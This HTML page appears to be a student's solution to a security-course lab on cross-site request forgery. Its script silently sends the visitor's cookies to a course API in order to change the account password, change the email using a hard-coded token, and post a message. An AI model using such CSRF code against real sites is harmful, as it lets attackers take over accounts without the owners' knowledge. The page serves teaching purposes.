<!DOCTYPE html>
<html>

<head>
  <title>08) CSRF</title>
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" />
</head>

<body class="container">

  <div class="row">
    <div class="col-12 mt-5">
      <div class="card">
        <div class="card-body text-center">
          <button class="btn btn-outline-info" onclick="docHandler.A1Submit()">Aufgabe 1</button>
        </div>
      </div>
    </div>
    <div class="col-12 mt-5">
      <div class="card">
        <div class="card-body text-center">
          <button class="btn btn-outline-info" onclick="docHandler.A2Submit()">Aufgabe 2</button>
        </div>
      </div>
    </div>
    <div class="col-12 mt-5">
      <div class="card">
        <div class="card-body text-center">
          <button class="btn btn-outline-info" onclick="docHandler.A3Submit()">Aufgabe 3</button>
        </div>
      </div>
    </div>
  </div>
  <script>
    var docHandler = {
      aufgabe1: {
        newPassword: "Pa$$w0rd"
      },
      aufgabe2: {
        newEmail: "test@test.ch"
      },
      aufgabe3: {
        postMessage: "this is a attack!"
      },
      A1Submit: async function () {
        const authResponse = await fetch('https://m183.gibz-informatik.ch/api/authentication/check', {
          credentials: 'include',
          method: 'GET',
        })

        const userdata = await authResponse.json();

        const payload = new FormData();
        payload.append("username", userdata.username);
        payload.append("password", docHandler.aufgabe1.newPassword);

        const changePwResponse = await fetch('https://m183.gibz-informatik.ch/api/csrf/changePassword', {
          credentials: 'include',
          method: 'POST',
          body: payload
        })
      },
      A2Submit: async function () {
        const response = await fetch('https://m183.gibz-informatik.ch/api/csrf/changeEmail?csrf=d4b9aead1dd10a596542&email=' + docHandler.aufgabe2.newEmail, {
          credentials: 'include',
          method: 'GET'
        })
      },
      A3Submit: async function () {

        const payload = new FormData();
        payload.append("message", docHandler.aufgabe3.postMessage);

        const response = await fetch('https://m183.gibz-informatik.ch/api/csrf/postMessage', {
          credentials: 'include',
          method: 'POST',
          body: payload
        })
      }
    };
  </script>
</body>

</html>